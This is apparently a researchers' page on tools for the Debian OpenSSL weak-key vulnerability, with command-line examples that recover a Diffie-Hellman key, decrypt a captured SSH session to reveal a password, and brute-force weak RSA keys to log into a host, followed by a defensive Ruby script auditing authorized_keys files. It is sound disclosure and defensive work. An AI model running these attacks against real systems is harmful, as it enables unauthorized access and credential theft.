SSH tools related to the OpenSSL/Debian vulnerability

About these tools

We (Raphaël Rigo, Romain Raboin and Julien Tinnes) gave a short talk at SSTIC 08 about some of the tools we and Yoann Guillot wrote after the OpenSSL/Debian advisory to remotely discover vulnerable keys in authorized_keys files, decipher SSH traffic and retrieve DSA private keys (even from non-weak keys). We also wrote an article in French in this MISC issue.

For now we have disclosed the following tools (we might add other tools soon):

Example 1 (ssh_kex_keygen)

    ./keygen -g $MYGROUP -k $MYSNIFFED_GA -b 256 -s -p 0-32767 -n 4
    KEY : 00301439070BCC051E15569D2F7F9BD0ABBD3AA8755AC939B53EED39D266251C3377435
    PID : 30149

Example 2 (ssh_decoder)

    $ tcpick -wRC -wRS -r pcapssh_putty.cap
    Starting tcpick 0.2.1 at 2008-07-09 17:37 CEST
    Timeout for connections is 600
    tcpick: reading from pcapssh_putty.cap
    1 SYN-SENT 172.24.94.237:52363 > 172.24.83.255:ssh
    1 SYN-RECEIVED 172.24.94.237:52363 > 172.24.83.255:ssh
    1 ESTABLISHED 172.24.94.237:52363 > 172.24.83.255:ssh
    1 FIN-WAIT-1 172.24.94.237:52363 > 172.24.83.255:ssh
    1 TIME-WAIT 172.24.94.237:52363 > 172.24.83.255:ssh
    1 CLOSED 172.24.94.237:52363 > 172.24.83.255:ssh
    tcpick: done reading from pcapssh_putty.cap
    69 packets captured
    1 tcp sessions detected
    $ ls tcpick*
    tcpick_172.24.94.237_172.24.83.255_ssh.clnt.dat
    tcpick_172.24.94.237_172.24.83.255_ssh.serv.dat
    $ ruby ssh_decoder.rb tcpick*
    * read handshake
    cipher: aes256-ctr, mac: hmac-sha1, kex_hash: sha1, compr: none
    * bruteforce DH
    DH shared secret : 00c81a4d4fe19a522a972bb9ede9d5901.....(cut)
    * derive keys
    * decipher streams
    * successful authentication packet
    {:username=>"toto", :nextservice=>"ssh-connection", :auth_method=>"password", :change=>0, :password=>"toto"}
    * deciphered streams saved to "sshdecrypt.0.client.dat" & "sshdecrypt.0.server.dat"

Example 3 (bfssh)

    $ ./bfssh -h ssllol -u toto -p22 -d6 -t rsa -s 2048 -a x86
    == BFSSH a strong debian weak key bruteforcer ==
    MaxAuthTries: 6
    STATUS: thread: 5 test key: 05790 ... 05795
    Authentication success: ./key-x86/rsa2048/id_rsa.05784.pub
    $ ssh -i ./key-x86/rsa2048/id_rsa.05784 toto@ssllol
    [snip]
    $ id
    uid=1000(toto) gid=1000(toto) groups=4(adm),109(admin),1000(toto)
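
Example 3 shows that one weak public key left in an authorized_keys file is enough to log in, so the defensive counterpart is to audit those files against a list of known-weak fingerprints. The Ruby script below is an added example, not one of the tools described on this page; the blocklist layout (last 20 hex digits of each weak key's MD5 fingerprint), the function names and the sample file are assumptions, and the sample key blobs are constructed, not real keys.

```ruby
require 'digest'
require 'set'

# RSA and DSA public key lines; login options may precede the key type.
KEY_RE = %r{(?:\A|\s)(ssh-rsa|ssh-dss)\s+([A-Za-z0-9+/]+={0,2})(?:\s+(.*))?\z}

# MD5 fingerprint (hex, no colons) of a public key blob; nil when the blob is
# not valid base64 or its embedded type string disagrees with the line.
def blob_fingerprint(type, b64)
  blob = b64.unpack1('m0')               # strict base64, raises ArgumentError
  len = blob.unpack1('N')                # length of the leading type string
  return nil unless len == type.bytesize && blob[4, len] == type
  Digest::MD5.hexdigest(blob)
rescue ArgumentError
  nil
end

# Every key in an authorized_keys text whose fingerprint suffix is blocklisted.
def audit_authorized_keys(text, blocklist)
  hits = []
  text.each_line.with_index(1) do |raw, no|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    m = KEY_RE.match(line) or next
    fp = blob_fingerprint(m[1], m[2]) or next
    next unless blocklist.include?(fp[-20, 20])
    hits << { line: no, type: m[1], comment: m[3].to_s, fingerprint: fp }
  end
  hits
end

# Constructed sample data: well-formed blobs, not real keys.
def sample_blob(type, filler)
  [[type.bytesize].pack('N') + type + filler].pack('m0')
end

WEAK = sample_blob('ssh-rsa', 'constructed-blocklisted-key')
SAMPLE = <<~KEYS
  # constructed authorized_keys file
  ssh-rsa #{sample_blob('ssh-rsa', 'constructed-good-key')} alice@laptop
  command="/usr/bin/backup",no-pty ssh-rsa #{WEAK} backup@old-debian
  ssh-dss #{sample_blob('ssh-rsa', 'type-mismatch')} malformed
KEYS
BLOCKLIST = Set[blob_fingerprint('ssh-rsa', WEAK)[-20, 20]]

audit_authorized_keys(SAMPLE, BLOCKLIST).each do |h|
  puts "line #{h[:line]}: #{h[:type]} #{h[:fingerprint]} (#{h[:comment]})"
end
```

A key reported here has to be removed from the file and regenerated on a fixed system; deleting the line alone leaves the owner without a valid key.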